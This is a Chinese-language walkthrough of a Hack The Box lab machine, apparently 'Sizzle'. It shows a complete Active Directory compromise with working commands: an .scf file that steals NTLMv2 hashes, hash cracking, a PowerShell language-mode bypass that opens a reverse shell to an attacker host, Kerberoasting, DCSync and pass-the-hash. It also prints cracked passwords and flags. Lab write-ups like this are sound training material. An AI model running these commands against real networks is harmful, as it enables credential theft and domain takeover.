Windows域渗透实战：从NTLM窃取到DCSync权限提升

1. 信息收集阶段

1.1 端口扫描与识别

使用Nmap进行全端口扫描：

nmap -p- 10.10.10.103 --min-rate 1000 -sC -sV -Pn

关键发现：

• 21/tcp: 匿名FTP登录允许
• 80/tcp: Microsoft IIS 10.0
• 443/tcp: SSL证书显示域名为sizzle.htb.local
• 445/tcp: SMB服务
• 636/tcp: SSL/LDAP (Active Directory)
• 5985/tcp: WinRM服务
• 5986/tcp: SSL/WinRM服务

1.2 SMB枚举

尝试枚举SMB共享：

smbclient -N -L \\\\10.10.10.103

发现"Department Shares"共享可访问：

mkdir -p /mnt/10.10.10.103
mount -t cifs "//10.10.10.103/Department Shares" /mnt/10.10.10.103

2. 初始访问：NTLMv2哈希窃取

2.1 利用.scf文件窃取NTLMv2哈希

在Public共享创建恶意.scf文件：

[Shell]
Command=2
IconFile=\\10.10.16.12\icon

启动Responder捕获哈希：

sudo responder -I tun0

捕获到的NTLMv2哈希示例：

amanda::HTB:d3f7c7ba82bc852e:5303E82C9CC3D2753D1223C5C2A7208F:0101000000000000001630CD5311DB016FCA8DB03406550300000000020008004E0037004800560001001E00570049004E002D00580031004A00310047003300470048004C0038004E0004003400570049004E002D00580031004A00310047003300470048004C0038004E002E004E003700480056002E004C004F00430041004C00030014004E003700480056002E004C004F00430041004C00050014004E003700480056002E004C004F00430041004C0007000800001630CD5311DB0106000400020000000800300030000000000000000100000000200000AA6C757924875383D823CFA4AAE98627AFED9C1B8258F7B1597CADE1C5EAC1E80A001000000000000000000000000000000000000900200063006900660073002F00310030002E00310030002E00310036002E0031003200000000000000000000000000

2.2 破解NTLMv2哈希

使用Hashcat破解：

hashcat -m 5600 -a 0 hash /usr/share/wordlists/rockyou.txt --force

成功破解出密码：Ashare1972

3. 横向移动：AD CS证书服务利用

3.1 访问证书注册Web服务

URL: https://10.10.10.103/certsrv/
凭据: amanda/Ashare1972

3.2 生成证书请求

生成RSA私钥和CSR：

openssl genrsa -des3 -out amanda.key 2048
openssl req -new -key amanda.key -out amanda.csr

提交CSR到证书服务并下载base64编码的证书。

3.3 转换为PFX格式

openssl pkcs12 -in amanda.crt -inkey amanda.key -out amanda.pfx

4. 绕过受限语言模式(CLM)

4.1 检查PowerShell语言模式

$executioncontext.sessionstate.languagemode

4.2 使用PSByPassCLM绕过限制

下载并执行PSByPassCLM：

copy //10.10.16.12/share/PsBypassCLM.exe ./
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe /logfile= /LogToConsole=true /U /revshell=true /rhost=10.10.16.12 /rport=10017 \users\amanda\Documents\PsBypassCLM.exe

5. Kerberoasting攻击

5.1 使用Rubeus进行Kerberoasting

.\Rubeus.exe kerberoast /creduser:htb.local\amanda /credpassword:Ashare1972

捕获到的TGS示例：

$krb5tgs$23$*mrlky$HTB.LOCAL$http/sizzle@HTB.LOCAL*$1DD276F5FB0297F4BB3A69DCE2EA94A3$3BE6F93528230B53E00CAEF4ED763ACD399159A2F56F5C0EC0C301088F74CECD9B1FBA96E10423C1210555A27CAEA15F0BF590E79B149500AD3E3233514BD4E4654B8473BF4E99FCF24933967A2A3FA0C62A97EA2FE672D714B8AC9A68429D7F308AE6ACFA93A1307B262F526FEF2E25E9569F9FAD9F034D674FD7949263DD7DBF31D189275CCF0DE6202FA3B6A35C280F4E2572DF7497B75CAD32D0291E637DDD10BF5506D1E766EF01A1021487DE75218FB5B23CE6FA762DC7794763A02F5C0CF7132A7D2FBA2C4AB415ECA9E836075445B067CD852725F2C6294666C0EF2C3E361D028D2D73FD993B6C89175D9F6ADAE0D367A5E80F86E03864350788B1DCBFDF3DF593B159346DEBD2EDC594BA232B7A6D7EC190D273E05D3018DA482068964F871469E028763FC40E937855F897349E29D0DA3AEB3E88CE5429F53BCA5F63CFB2DC25F050C2AB63BA947DA617C4014A837BBE6A5FDFC8504FC089CAEB321C8FE219540FB3DA66460D61098FBEFE0B86EE650B29C2C5CCFC13A9BF1D3508846942B8A1D187A1C861AF3303BE7C719B3423464CACAABC30AAAFD605618B68440D25F2427CF7CAD854F658EDCDF33E18F5C9C7B6166DC9E5DA6884B9B5A810D1CFA7B7BE5F8BCFA9E9F125B4375F7962871BF02E8BC281AF9D68324DFE4DE02375C67E0FC343E76202B5BA00F6FD6F1BEC8EDBE685DF26C14A3D9D2E0824A14C37F8BAA0A33F70893A63EC2ECAB55D559FF42355F415623E5ABAA34847E57499D296D69FF0AFFBE15141B42DD1817B5D0B437597A735A8B6A10B98417A1D9144D68D48B81F8BDCA89D0F4739B25629EBAE0EBAD35276C2E64D293067DF9F6434FEB1E31CB6675AE22F5D952D38FD07550FB54FD7B601977E4AA16A964714807D38B9FCFD3A88126C3B3029A812B577210B47A605BB17394F51DAEFD00D60304768ABD8ED1F1936251116C93CD2514FFCA03628B9F866E94A08EC6CECEF573EED39FE161C8354891E12CC195E1B02E731C3B03E58E2C4FBD72F6371E2915033D56B885C46065122B41BF9F4DB25A17AF64F0AC62F20E68625D8B39024AFF24EFE8B54EDDC5BA336DC84C4A2FFE11CC7DBB863D76791DCEDD2811AA6048E4C0B94B2D30BF1BB5FA2163CB76285A841BB08E6ED9CE740D12C9F35877969FA8DF6D27C08EC26E5B4E7D6F2AEC9E82DF347D180380425DCBD6781E8EAC8F3AC3CFE54C18A972C893C1893EFBDFDEE49465F72C7ED78C71E1217104D214C2E92B0CBC40DB06FBB7DE6BC80BA2839E5F0C431D4152AB4C2A02E538935FD08B5D304FC8D84E722F66644BD0659F99FAF78CEEDCA443132CCF9B792AEF02B473B4D7A6AB9E945585BB

5.2 破解Kerberos票据

hashcat -m 13100 -a 0 tgt /usr/share/wordlists/rockyou.txt --force

成功破解出密码：Football#7

6. 权限提升：DCSync攻击

6.1 使用Impacket进行DCSync

impacket-secretsdump -just-dc mrlky:Football#7@10.10.10.103

6.2 获取域管理员哈希

示例输出：

Administrator:500:aad3b435b51404eeaad3b435b51404ee:336d863559a3f7e69371a85ad959a675:::

6.3 使用哈希传递攻击

impacket-psexec administrator@10.10.10.103 -hashes 336d863559a3f7e69371a85ad959a675:f6b7160bfc91823792e0ac3a162c9267

7. 获取标志

• 用户标志：142f5652463ac38124e3adf5a1b5f402
• 管理员标志：07b28721aa122e7bfcd54ab1dc06c57a

关键知识点总结

1. NTLMv2哈希窃取：通过.scf文件中的恶意IconFile路径触发SMB认证请求
2. AD CS证书服务利用：通过证书注册Web服务获取用户证书，用于身份验证
3. 受限语言模式绕过：使用PSByPassCLM等技术绕过PowerShell的安全限制
4. Kerberoasting攻击：获取服务账户的TGS票据并离线破解
5. DCSync攻击：模拟域控制器行为获取域内所有用户的密码哈希
6. 哈希传递攻击：使用NTLM哈希直接获取系统权限